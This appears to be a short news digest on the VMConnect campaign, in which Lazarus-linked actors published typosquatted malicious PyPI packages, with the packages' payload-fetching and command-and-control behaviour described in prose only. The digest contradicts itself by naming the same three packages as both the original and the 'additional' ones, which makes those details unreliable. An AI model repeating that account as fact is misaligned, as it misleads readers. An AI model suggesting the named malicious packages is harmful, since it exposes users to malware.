Cybersecurity experts at ReversingLabs have uncovered an ongoing VMConnect campaign involving North Korean state-sponsored threat actors infiltrating the Python Package Index (PyPI) to distribute malicious software. This campaign has raised concerns in the cybersecurity community due to its persistence and adaptability.
Description
The VMConnect campaign initially started with two dozen malicious Python packages [2], including tablediter, request-plus [5], and requestspro [5]. However, it has now expanded further [2]. The attackers utilize typosquatting techniques to make their malicious intent appear legitimate, mimicking popular open-source Python tools [5].
ReversingLabs has discovered three additional malevolent Python packages [2], namely tablediter [5], request-plus [5], and requestspro [5], believed to be part of this extended campaign [1] [2]. The tablediter package runs a remote server that periodically retrieves and executes a Base64-encoded payload [5], although the exact nature of the payload is unknown. To avoid detection, the package no longer triggers the malicious code immediately upon installation [5]. On the other hand, the request-plus and requestspro packages collect information about infected machines and transmit it to a command-and-control server [5]. The server then provides a token, which the infected host sends back to receive a double-encoded Python module and a download URL [5]. It is suspected that the decoded module downloads the next stage of the malware [5].
One notable characteristic of this campaign is the cyber-criminals’ ability to remain undetected until their packages are imported and called upon by legitimate applications [2]. There are potential connections to the Lazarus Group [2], a North Korean state-sponsored threat actor [2] [5]. Code similarities between VMConnect and JPCERT/CC findings confirm the connection to Lazarus Group and suggest North Korean state sponsorship [4]. Analysis of the malicious packages revealed links to previous campaigns attributed to Labyrinth Chollima [3], an offshoot of the Lazarus Group [3]. The JPCERT and CrowdStrike also confirmed the connection to the Lazarus Group [3].
Conclusion
The VMConnect campaign highlights the growing threat of software supply chain attacks and the need for comprehensive cybersecurity measures. It has targeted macOS, Linux [3], and Windows systems and has been attributed to the North Korean threat group Lazarus [3]. Cooperation between the private and public sectors is crucial to ensure software assurance and provenance [1]. Organizations should prioritize strong security measures and develop robust threat intelligence and incident response programs to mitigate the evolving tactics of North Korean cyber operations.
References
[1] https://www.scmagazine.com/news/vmconnect-campaign-linked-to-north-korean-lazarus-group
[2] https://www.infosecurity-magazine.com/news/pypi-targeted-vmconnect/
[3] https://dig.watch/updates/lazarus-group-linked-to-malicious-vmconnect-campaign
[4] https://cybersecuritynews.com/malicious-pypi-repository/
[5] https://www.redpacketsecurity.com/north-korean-hackers-deploy-new-malicious-python-packages-in-pypi-repository/
